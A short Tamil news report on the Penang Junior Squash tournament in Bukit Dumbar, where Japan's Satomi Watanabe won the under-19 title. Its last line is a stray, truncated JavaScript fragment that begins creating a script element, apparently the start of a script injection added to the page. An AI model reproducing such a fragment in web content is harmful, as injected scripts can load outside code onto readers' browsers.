பினாங்கு நீர் வாரியத்தின் ஏற்பாட்டில் பினாங்கு ஜூனியர் ஸ்குவாஷ் போட்டி புக்கிட் டும்பாரில் அனைந்துள்ள நிகோல் டேவிட் அனைத்துலக ஸ்குவாஷ் மையத்தில் கடந்த 22 ஆகஸ்டு தொடங்கி 27 ஆகஸ்டு வரை நடைபெற்றது. ஜூனியர் ஸ்குவாஷ் இறுதிப்போட்டியை நேரில் சென்று பார்வையிட்டார் இளைஞர், விளையாட்டு, மகளிர், குடும்ப மற்றும் சமூக நல்வாழ்வு ஆட்சிக்குழு உறுப்பினர் சோங் எங்.
ஐந்து பிரிவுகளாக ஆண் பெண் என இரண்டு குழுக்களுடன் நடைபெற்ற ஜுனியர் ஸ்குவாஷ் போட்டியில் பத்தொன்பது வயதுக்கு கீழ்ப்பட்ட பிரிவில் ஜப்பானை சேர்ந்த பதினேழு வயது நிரம்பிய சதோமி வாதானாபே வெற்றி வாகை சூடினார். முதல் முறையாக ஜுனியர் ஸ்குவாஷ் போட்டியில் பங்கேற்கும் இவர் வெற்றி வாகை சூடியது பாராட்டக்கூடியது என வாழ்த்து தெரிவித்தார் ஆட்சிக்குழு உறுப்பினர் சோங் எங்.
var d=document;var s=d.createElement(‘script’);